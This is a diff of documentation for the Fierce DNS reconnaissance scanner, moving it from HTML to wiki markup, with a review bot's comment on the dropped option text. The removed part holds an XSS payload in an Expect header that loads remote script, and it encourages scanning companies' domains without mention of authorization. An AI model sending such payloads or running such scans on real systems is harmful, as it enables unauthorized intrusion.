| 14 | | <p>Next, if it finds anything on any IP address it will scan up and down a set amount (default 5 but you can expand it with -traverse or increase it to the entire subnet with -wide) looking for anything else with the same domain name in it using reverse lookups. If it finds anything on any of those it will recursively scan until it doesn't find any more. In this way it ends up looping a lot, and the bigger the domain is the more you get back. The reason Fierce automatically switches to using the target's DNS server is so that it can probe the Intranet (RFC1918) of the target, assuming the target uses a single DNS server for both their Intranet and external sites.</p> |
| 15 | | |
| 16 | | <p>I also added a random call to something that should fail to test for wildcard DNS. If it's found, the wildcard is discarded to reduce erroneous results. That doesn't speed up the scan because it still needs to check to see if the test resolves back to IP address that the wildcard is pointing to. However it does reduce false positives.</p> |
| 17 | | |
| 18 | | <p>Also, I've added a "search" option that allows you to find other non-related domain names. For example, let's say my target's domain is widget.com but I know they have email addresses like soandso@widgetcompany.com and own another company called nutsandbolts.com I can add search queries. This won't scan for those domains, but if those names pop up, it won't ignore them. Fierce will report on anything inside the search pattern as long as it matches. If you want everything I guess you could put a,b,c,...,x,y,z but I'll probably make something in the future to allow for scanning/reporting the entire C block once anything is found in it that matches the DNS string. Here's the syntax:</p> |
| 19 | | |
| 20 | | <p><b>perl fierce.pl -dns widget.com -search widgetcompany,nutsandbolts</b></p> |
| 21 | | |
| 22 | | <p>I also realized it can be a little bad about finding everything in a class C if the target used non-contiguous blocks within the class C. To deal with that I built in a function to allow a scan (of only C blocks). This is also really useful for scanning intranets if the DNS is poorly configured. I might expand on this later.</p> |
| 23 | | |
| 24 | | <p><b>perl fierce.pl -range 10.10.10.0-255 -dnsserver ns1.example.com</b></p> |
| 25 | | |
| 26 | | <p>As an alternative, you can use the -wide switch which does a wide path of reverse lookups after finding any C names that match your query in the C block. This provides a lot more information but is a lot more noisy.</p> |
| 27 | | |
| 28 | | <p><b>perl fierce.pl -dns example.com -wide -file output.txt</b></p> |
| 29 | | |
| 30 | | <p>Finally, for the web application security folks I added a command to connect to any http servers on port 80 and perform whatever action you put into a configuration file. This is really noisy and really slow (especially on large networks), so I wouldn't recommend trying it unless you have a few hours with nothing better to do, unless you know there are only a handful of machines or have already ran this without the connect scan turned on.</p> |
| 31 | | |
| 32 | | <p><b>perl fierce.pl -dns example.com -connect headers.txt -fulloutput -file output.txt</b></p> |
| 33 | | |
| 34 | | <p>Here's what a sample header file might look like. The sample file below is attempting to exploit the <A HREF="http://ha.ckers.org/blog/20060731/expect-header-injection-via-flash/">Expect cross site scripting vulnerability</A>:</p> |
| 35 | | |
| 36 | | <p><textarea cols=55 rows=3>GET / HTTP/1.0 |
| 37 | | User-Agent: Mozilla/5.0 |
| 38 | | Host: |
| 39 | | Expect: <script src=http://ha.ckers.org/xss.js></script></textarea></p> |
| 40 | | |
| 41 | | <p>Fierce also has wordlist support so that you can supply your own dictionary using the -wordlist keyword. Since the brute force does rely on matching at least a few internal targets, this could be helpful if you know that the naming convention has to do with a certain non-obvious naming convention or uses another language, etc.</p> |
| 42 | | |
| 43 | | <p><b>perl fierce.pl -dns example.com -wordlist dictionary.txt -file output.txt</b></p> |
| 44 | | |
| 45 | | <p>Not convinced? Prior to running the scan I had never been to either mail.ru or rambler.ru (a few of the top Alexa sites in Russia). Since I don't read Russian, performing an audit against them is far more difficult. Here's some sample output from the two. In the first example you can see that mail.ru has a non-contiguous address for it's mobile.mail.ru than it does for the rest of the site. That would have been very difficult to locate with any other scanner. In the rambler.ru example you can see the RFC1918 space 10.* pop up:</p> |
| 46 | | |
| 47 | | <p> |
| 48 | | <UL> |
| 49 | | <LI><A HREF="http://ha.ckers.org/fierce/mail.ru">mail.ru</A> - 418 entries and 303 hostnames found. |
| 50 | | <LI><A HREF="http://ha.ckers.org/fierce/rambler.ru">rambler.ru</A> - 472 entries and 458 hostnames found. |
| 51 | | </UL> |
| 52 | | </p> |
| 53 | | |
| 54 | | <p>Trust me, we've found far more interesting sites than these two in our tests, but I don't want to disparage any companies for their mistakes. I'm sure you can think of a few companies to test this against. The results can be pretty amazing. If you don't get many results, that could be one of three things, 1) you aren't scanning their corporate domain, you are only scanning their external domain which they only have one or two machines on 2) it's a very small company or 3) you typo'd the domain name (I haven't built any checks to make sure the domain you entered is valid).</p> |
| 55 | | |
| 56 | | <p>Requirements: This is a PERL program requiring the PERL interpreter with the modules <A HREF="http://www.net-dns.org/">Net::DNS</A> and <A HREF="http://perldoc.perl.org/Net/hostent.html">Net::hostent</A>. You can install modules using CPAN:</p> |
| 57 | | |
| 58 | | <p><blockquote>perl -MCPAN -e 'install Net::DNS'<br> |
| 59 | | perl -MCPAN -e 'install Net::hostent'</blockquote></p> |
| 60 | | |
| 61 | | <p><IMG SRC="http://ha.ckers.org/images/microsoft_icon.gif" align="left" width="50" height="50"><b>Windows users</b>: You can use Fierce under Windows if you use <A HREF="http://www.cygwin.com/">Cygwin</A> with PERL and the above two modules installed. I have not tested this using ActivePerl in Windows, so I would recommend Cygwin until ActivePerl can be thoroughly tested. I am/was working on a win32 version of Fierce, but have put the project on hold. If anyone is interested in picking up where I left off, drop <A HREF="http://ha.ckers.org/blog/about/">me</A> a line.</p> |
| 62 | | |
| 63 | | <p>Version: Fierce is currently at version 1.0.3 - 03/23/2008</p> |
| 64 | | |
| 65 | | <p>Download: <A HREF="http://ha.ckers.org/fierce/fierce.pl">fierce.pl</A></p> |
| 66 | | |
| 67 | | <p>Download: <A HREF="http://ha.ckers.org/fierce/hosts.txt">hosts.txt</A></p> |
| 68 | | |
| 69 | | <p>(Thanks to Robert E Lee for the help with this and to Michael Thumann's <A HREF="http://www.ernw.de/en/eng_security_tools.html">DNSDigger</A> wordlist).</p> |
| 70 | | |
| 71 | | <p>Getting started: <B>perl fierce.pl -help</B></p> |
| 72 | | |
| 73 | | <p>This may have some bugs in it. Also this can be a noisy scanner, but in the tests I've performed it's exceptionally effective at finding non-contiguous IP blocks and new attack points. This should be considered a pre-cursor to <A HREF="http://insecure.org/nmap/">nmap</A>, <A HREF="http://www.unicornscan.org/">unicornscan</A> or <A HREF="http://www.nessus.org/">nessus</A> as it gives you enough information to begin a much more thorough scan with one of those other tools. Also, it can point out DNS entries for hosts that are no longer up or have not yet been put into production. Please use Fierce with care and at your own risk.</p> |
| 74 | | |
| | 13 | Requirements: This is a Perl program requiring the Perl interpreter with the modules Net::DNS and Net::hostent. You can install modules using CPAN: |
| | 14 | {{{ |
| | 15 | perl -MCPAN -e 'install Net::DNS' |
| | 16 | perl -MCPAN -e 'install Net::hostent' |
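Review bot: the option documentation is dropped without a visible replacement. The removed region (old 14-73) carried the usage text for -traverse, -wide, -search, -range, -dnsserver, -connect, -wordlist and -file, the wildcard-DNS check, the mail.ru/rambler.ru sample-output links, the version/date line (1.0.3 - 03/23/2008) and the fierce.pl/hosts.txt download links, while the added lines (new 13-16) restore only the Requirements paragraph and its two CPAN commands; unless the rest is re-added elsewhere in the converted page, the wiki loses the whole option reference. Two smaller conversion points: the `{{{` block opened at new line 14 needs a matching `}}}` after `perl -MCPAN -e 'install Net::hostent'` (the closing line is not visible in this excerpt), and when the remaining examples are ported, the `<b>perl fierce.pl ...</b>` command lines and the `<textarea>` sample header file should become `{{{ }}}` blocks too, since the new page is wiki markup rather than HTML. Worth carrying over verbatim is the caveat from old line 54 that nothing validates the supplied domain name, so a typo silently yields an empty result set.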